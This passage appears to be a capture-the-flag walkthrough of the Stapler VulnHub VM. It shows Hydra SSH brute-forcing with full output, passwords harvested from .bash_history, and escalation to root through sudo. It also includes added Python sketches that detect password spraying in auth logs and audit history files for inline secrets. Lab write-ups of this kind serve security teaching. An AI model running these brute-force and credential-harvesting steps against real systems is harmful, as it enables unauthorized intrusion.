drwxr-xr-x    3 0        0            4096 Jun 03  2016 pm
drwxr-xr-x    5 0        0            4096 Jun 03  2016 polkit-1
drwxr-xr-x    3 0        0            4096 Jun 03  2016 postfix
drwxr-xr-x    4 0        0            4096 Jun 03  2016 ppp
-rw-r--r--    1 0        0             575 Oct 22  2015 profile
drwxr-xr-x    2 0        0            4096 Jun 03  2016 profile.d
-rw-r--r--    1 0        0            2932 Oct 25  2014 protocols
drwxr-xr-x    2 0        0            4096 Jun 03  2016 python
drwxr-xr-x    2 0        0            4096 Jun 03  2016 python2.7
drwxr-xr-x    2 0        0            4096 Jun 03  2016 python3
drwxr-xr-x    2 0        0            4096 Jun 03  2016 python3.5
-rwxr-xr-x    1 0        0             472 Jun 06  2016 rc.local
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc0.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc1.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc2.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc3.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc4.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc5.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rc6.d
drwxr-xr-x    2 0        0            4096 Jun 06  2016 rcS.d
-rw-r--r--    1 0        0              62 Jun 07  2016 resolv.conf
drwxr-xr-x    5 0        0            4096 Jun 06  2016 resolvconf
-rwxr-xr-x    1 0        0             268 Nov 10  2015 rmt
-rw-r--r--    1 0        0             887 Oct 25  2014 rpc
-rw-r--r--    1 0        0            1371 Jan 27  2016 rsyslog.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 rsyslog.d
drwxr-xr-x    3 0        0            4096 Mar 13 11:04 samba
-rw-r--r--    1 0        0            3663 Jun 09  2015 screenrc
-rw-r--r--    1 0        0            4038 Mar 29  2016 securetty
drwxr-xr-x    4 0        0            4096 Jun 03  2016 security
drwxr-xr-x    2 0        0            4096 Jun 03  2016 selinux
-rw-r--r--    1 0        0           19605 Oct 25  2014 services
drwxr-xr-x    2 0        0            4096 Jun 03  2016 sgml
-rw-r-----    1 0        42           4518 Jun 05  2016 shadow
-rw-------    1 0        0            1873 Jun 03  2016 shadow-
-rw-r--r--    1 0        0             125 Jun 03  2016 shells
drwxr-xr-x    2 0        0            4096 Jun 03  2016 skel
-rw-r--r--    1 0        0             100 Nov 25  2015 sos.conf
drwxr-xr-x    2 0        0            4096 Jun 04  2016 ssh
drwxr-xr-x    4 0        0            4096 Jun 03  2016 ssl
-rw-r--r--    1 0        0             644 Jun 04  2016 subgid
-rw-------    1 0        0             625 Jun 03  2016 subgid-
-rw-r--r--    1 0        0             644 Jun 04  2016 subuid
-rw-------    1 0        0             625 Jun 03  2016 subuid-
-r--r-----    1 0        0             769 Jun 05  2016 sudoers
drwxr-xr-x    2 0        0            4096 Jun 03  2016 sudoers.d
-rw-r--r--    1 0        0            2227 Jun 03  2016 sysctl.conf
drwxr-xr-x    2 0        0            4096 Jun 03  2016 sysctl.d
drwxr-xr-x    5 0        0            4096 Jun 03  2016 systemd
drwxr-xr-x    2 0        0            4096 Jun 03  2016 terminfo
-rw-r--r--    1 0        0              14 Jun 03  2016 timezone
drwxr-xr-x    2 0        0            4096 Apr 12  2016 tmpfiles.d
-rw-r--r--    1 0        0            1260 Mar 16  2016 ucf.conf
drwxr-xr-x    4 0        0            4096 Jun 03  2016 udev
drwxr-xr-x    3 0        0            4096 Jun 03  2016 ufw
drwxr-xr-x    2 0        0            4096 Jun 03  2016 update-motd.d
drwxr-xr-x    2 0        0            4096 Jun 03  2016 update-notifier
drwxr-xr-x    2 0        0            4096 Jun 03  2016 vim
drwxr-xr-x    3 0        0            4096 Jun 03  2016 vmware-tools
-rw-r--r--    1 0        0             278 Jun 03  2016 vsftpd.banner
-rw-r--r--    1 0        0               0 Jun 03  2016 vsftpd.chroot_list
-rw-r--r--    1 0        0            5961 Jun 04  2016 vsftpd.conf
-rw-r--r--    1 0        0               0 Jun 03  2016 vsftpd.user_list
lrwxrwxrwx    1 0        0              23 Jun 03  2016 vtrgb -> /etc/alternatives/vtrgb
-rw-r--r--    1 0        0            4942 Jan 08  2016 wgetrc
drwxr-xr-x    3 0        0            4096 Jun 03  2016 xdg
drwxr-xr-x    2 0        0            4096 Jun 03  2016 xml
drwxr-xr-x    2 0        0            4096 Jun 03  2016 zsh
226 Directory send OK.
ftp> 

Looks like it is pointing to the /etc folder. I ploughed through almost all the files, but I couldn’t find anything noteworthy. Probably another rabbit hole.

SSH

kali@kali:~/Desktop/vulnhub/stapler$ hydra -L user.txt -e nsr stapler.com ssh -V
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-07 08:36:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:38/p:3), ~8 tries per task
[DATA] attacking ssh://stapler.com:22/
[ATTEMPT] target stapler.com - login "Elly" - pass "Elly" - 1 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "Elly" - pass "" - 2 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "Elly" - pass "yllE" - 3 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "elly" - 4 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "" - 5 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "ylle" - 6 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "John" - pass "John" - 7 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "John" - pass "" - 8 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "John" - pass "nhoJ" - 9 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "john" - pass "john" - 10 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "john" - pass "" - 11 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "john" - pass "nhoj" - 12 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "Harry" - pass "Harry" - 13 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "Harry" - pass "" - 14 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "Harry" - pass "yrraH" - 15 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "harry" - pass "harry" - 16 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "harry" - pass "" - 17 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "harry" - pass "yrrah" - 18 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "peter" - pass "peter" - 19 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "peter" - pass "" - 20 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "peter" - pass "retep" - 21 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "RNunemaker" - pass "RNunemaker" - 22 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "RNunemaker" - pass "" - 23 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "RNunemaker" - pass "rekamenuNR" - 24 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "ETollefson" - pass "ETollefson" - 25 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "ETollefson" - pass "" - 26 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "ETollefson" - pass "nosfelloTE" - 27 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "DSwanger" - pass "DSwanger" - 28 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "DSwanger" - pass "" - 29 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "DSwanger" - pass "regnawSD" - 30 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "AParnell" - pass "AParnell" - 31 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "AParnell" - pass "" - 32 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "AParnell" - pass "llenraPA" - 33 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "SHayslett" - pass "SHayslett" - 34 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "SHayslett" - pass "" - 35 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "SHayslett" - pass "ttelsyaHS" - 36 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "MBassin" - pass "MBassin" - 37 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "MBassin" - pass "" - 38 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "MBassin" - pass "nissaBM" - 39 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "JBare" - pass "JBare" - 40 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "JBare" - pass "" - 41 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "JBare" - pass "eraBJ" - 42 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "LSolum" - pass "LSolum" - 43 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "LSolum" - pass "" - 44 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "LSolum" - pass "muloSL" - 45 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "IChadwick" - pass "IChadwick" - 46 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "IChadwick" - pass "" - 47 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "IChadwick" - pass "kciwdahCI" - 48 of 114 [child 15] (0/0)
[22][ssh] host: stapler.com   login: SHayslett   password: SHayslett
[ATTEMPT] target stapler.com - login "MFrei" - pass "MFrei" - 49 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "MFrei" - pass "" - 50 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "MFrei" - pass "ierFM" - 51 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "SStroud" - pass "SStroud" - 52 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "SStroud" - pass "" - 53 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "SStroud" - pass "duortSS" - 54 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "CCeaser" - pass "CCeaser" - 55 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "CCeaser" - pass "" - 56 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "CCeaser" - pass "resaeCC" - 57 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "JKanode" - pass "JKanode" - 58 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "JKanode" - pass "" - 59 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "JKanode" - pass "edonaKJ" - 60 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "CJoo" - pass "CJoo" - 61 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "CJoo" - pass "" - 62 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "CJoo" - pass "ooJC" - 63 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "Eeth" - pass "Eeth" - 64 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "Eeth" - pass "" - 65 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "Eeth" - pass "hteE" - 66 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "LSolum2" - pass "LSolum2" - 67 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "LSolum2" - pass "" - 68 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "LSolum2" - pass "2muloSL" - 69 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "JLipps" - pass "JLipps" - 70 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "JLipps" - pass "" - 71 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "JLipps" - pass "sppiLJ" - 72 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "jamie" - pass "jamie" - 73 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "jamie" - pass "" - 74 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "jamie" - pass "eimaj" - 75 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "Sam" - pass "Sam" - 76 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "Sam" - pass "" - 77 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "Sam" - pass "maS" - 78 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "Drew" - pass "Drew" - 79 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "Drew" - pass "" - 80 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "Drew" - pass "werD" - 81 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "jess" - pass "jess" - 82 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "jess" - pass "" - 83 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "jess" - pass "ssej" - 84 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "SHAY" - pass "SHAY" - 85 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "SHAY" - pass "" - 86 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "SHAY" - pass "YAHS" - 87 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "Taylor" - pass "Taylor" - 88 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "Taylor" - pass "" - 89 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "Taylor" - pass "rolyaT" - 90 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "mel" - pass "mel" - 91 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "mel" - pass "" - 92 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "mel" - pass "lem" - 93 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "kai" - pass "kai" - 94 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "kai" - pass "" - 95 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "kai" - pass "iak" - 96 of 114 [child 8] (0/0)
[ATTEMPT] target stapler.com - login "zoe" - pass "zoe" - 97 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "zoe" - pass "" - 98 of 114 [child 14] (0/0)
[ATTEMPT] target stapler.com - login "zoe" - pass "eoz" - 99 of 114 [child 3] (0/0)
[ATTEMPT] target stapler.com - login "NATHAN" - pass "NATHAN" - 100 of 114 [child 12] (0/0)
[ATTEMPT] target stapler.com - login "NATHAN" - pass "" - 101 of 114 [child 10] (0/0)
[ATTEMPT] target stapler.com - login "NATHAN" - pass "NAHTAN" - 102 of 114 [child 11] (0/0)
[ATTEMPT] target stapler.com - login "www" - pass "www" - 103 of 114 [child 13] (0/0)
[ATTEMPT] target stapler.com - login "www" - pass "" - 104 of 114 [child 15] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "elly" - 106 of 114 [child 0] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "" - 107 of 114 [child 4] (0/0)
[ATTEMPT] target stapler.com - login "elly" - pass "ylle" - 108 of 114 [child 5] (0/0)
[ATTEMPT] target stapler.com - login "tim" - pass "tim" - 109 of 114 [child 1] (0/0)
[ATTEMPT] target stapler.com - login "tim" - pass "" - 110 of 114 [child 2] (0/0)
[ATTEMPT] target stapler.com - login "tim" - pass "mit" - 111 of 114 [child 7] (0/0)
[ATTEMPT] target stapler.com - login "Tim" - pass "Tim" - 112 of 114 [child 9] (0/0)
[ATTEMPT] target stapler.com - login "Tim" - pass "" - 113 of 114 [child 6] (0/0)
[ATTEMPT] target stapler.com - login "Tim" - pass "miT" - 114 of 114 [child 8] (0/0)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-07 08:37:02

And we have a valid login.

[22][ssh] host: stapler.com   login: SHayslett   password: SHayslett
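Seen from the server, the Hydra run above is a single source failing against dozens of usernames inside a minute, followed by one success. The sketch below is an added example, not part of the original writeup, that flags that pattern in sshd logs; the log lines are constructed in OpenSSH's auth.log format, and the thresholds and the 192.168.15.20 client are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in OpenSSH auth.log format (not captured from the VM).
SAMPLE_LOG = """\
Mar  7 08:36:24 red sshd[1501]: Failed password for invalid user Elly from 192.168.15.4 port 40112 ssh2
Mar  7 08:36:24 red sshd[1502]: Failed password for elly from 192.168.15.4 port 40114 ssh2
Mar  7 08:36:25 red sshd[1503]: Failed password for invalid user John from 192.168.15.4 port 40116 ssh2
Mar  7 08:36:26 red sshd[1504]: Failed password for peter from 192.168.15.4 port 40118 ssh2
Mar  7 08:36:27 red sshd[1505]: Failed password for MBassin from 192.168.15.4 port 40120 ssh2
Mar  7 08:36:28 red sshd[1506]: Failed password for JBare from 192.168.15.4 port 40122 ssh2
Mar  7 08:36:31 red sshd[1507]: Accepted password for SHayslett from 192.168.15.4 port 40124 ssh2
Mar  7 09:10:02 red sshd[1620]: Failed password for zoe from 192.168.15.20 port 51000 ssh2
Mar  7 09:10:09 red sshd[1621]: Accepted password for zoe from 192.168.15.20 port 51002 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_spray(log_text, min_users=5, window=timedelta(seconds=60), year=2020):
    """Flag sources that fail against >= min_users distinct accounts within window."""
    failed, accepted = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so the caller supplies one
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        (failed if m["result"] == "Failed" else accepted)[m["ip"]].append((ts, m["user"]))
    alerts = {}
    for ip, events in failed.items():
        events.sort()
        # widest set of distinct usernames seen in any window starting at a failure
        widest = max(len({u for t, u in events[i:] if t - start <= window})
                     for i, (start, _) in enumerate(events))
        if widest >= min_users:
            # a success from the same source after the first failure is the real alarm
            hits = sorted({u for t, u in accepted[ip] if t >= events[0][0]})
            alerts[ip] = {"users": widest, "compromised": hits}
    return alerts
```

The single mistyped password from 192.168.15.20 stays below the threshold, while 192.168.15.4 is reported together with the account it got into.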

Low Shell

Log in using the brute-forced credentials.

kali@kali:~/Desktop/vulnhub/stapler$ ssh SHayslett@stapler.com
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
SHayslett@stapler.com's password: 
Welcome back!


SHayslett@red:~$ id
uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)

Root Shell

We can find some interesting stuff by looking through the contents of the .bash_history files of all the users.


[-] Location and contents (if accessible) of .bash_history file(s):
/home/MFrei/.bash_history
exit
/home/Sam/.bash_history
exit
/home/CCeaser/.bash_history
free
exit
/home/DSwanger/.bash_history
exit
/home/JBare/.bash_history
exit
/home/mel/.bash_history
exit
/home/jess/.bash_history
exit
/home/MBassin/.bash_history
exit
/home/kai/.bash_history
exit
/home/elly/.bash_history
exit
/home/Drew/.bash_history
exit
/home/JLipps/.bash_history
exit
exit
/home/jamie/.bash_history
top
ps aux
exit
/home/Taylor/.bash_history
exit
id
/home/peter/.bash_history
/home/SHayslett/.bash_history
exit
/home/JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
/home/AParnell/.bash_history
exit
/home/CJoo/.bash_history
exit
/home/Eeth/.bash_history
exit
/home/RNunemaker/.bash_history
exit
/home/SHAY/.bash_history
exit
/home/ETollefson/.bash_history
exit
/home/IChadwick/.bash_history
exit
/home/LSolum2/.bash_history
exit
whoami
/home/SStroud/.bash_history
exit
/home/LSolum/.bash_history
exit
/home/NATHAN/.bash_history
exit
/home/zoe/.bash_history
top
exit

We can see some passwords in here.

/home/JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
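The same finding can be turned into a host audit. The following is an added example, not part of the original writeup: it reports history files readable by other users and commands that carry a secret as an argument, redacting the secret in its output. The pattern list is an illustrative assumption, and the sample history is constructed to mirror the excerpt above.

```python
import os
import re
import stat
import tempfile

# Commands that take a secret as an argument; illustrative, not exhaustive.
SECRET_PATTERNS = [
    re.compile(r"\bsshpass\s+-p\s*(?P<secret>\S+)"),
    re.compile(r"\bmysql\b.*\s-p(?P<secret>\S+)"),
    re.compile(r"(?i)\b(?:password|passwd|token)=(?P<secret>\S+)"),
]

def audit_history(path):
    """Return (kind, message) findings for one history file, secrets redacted."""
    findings = []
    mode = os.stat(path).st_mode
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(("permissions",
                         f"{path} is readable by group/other ({stat.filemode(mode)})"))
    with open(path, errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for pat in SECRET_PATTERNS:
                m = pat.search(line)
                if m:
                    # never echo the secret itself into the audit report
                    shown = line[:m.start("secret")] + "<redacted>" + line[m.end("secret"):]
                    findings.append(("inline-secret", f"{path}:{lineno}: {shown.strip()}"))
                    break
    return findings

def demo():
    """Audit a constructed history file that mirrors the excerpt above."""
    history = ("id\nwhoami\nsshpass -p thisimypassword ssh JKanode@localhost\n"
               "apt-get install sshpass\nsshpass -p JZQuyIN5 peter@localhost\nps -ef\n")
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, ".bash_history")
        with open(path, "w") as fh:
            fh.write(history)
        os.chmod(path, 0o644)  # world-readable so the permission check fires (constructed)
        return [(kind, msg.replace(path, "~/.bash_history"))
                for kind, msg in audit_history(path)]

if __name__ == "__main__":
    for kind, msg in demo():
        print(f"[{kind}] {msg}")
```

Key-based authentication, or sshpass reading the password from a file (`-f`) or the SSHPASS environment variable (`-e`), keeps the secret out of the history file, and mode 600 on the history keeps other local users out of it.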

Log in using the credentials of peter.

kali@kali:~$ ssh peter@stapler.com
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
peter@stapler.com's password: 
Welcome back!
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses --- 

Aborting.
The function will be run again next time.  To prevent this, execute:
  touch ~/.zshrc
red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
➜  peter id
uid=0(root) gid=0(root) groups=0(root)

Root was just a sudo away.
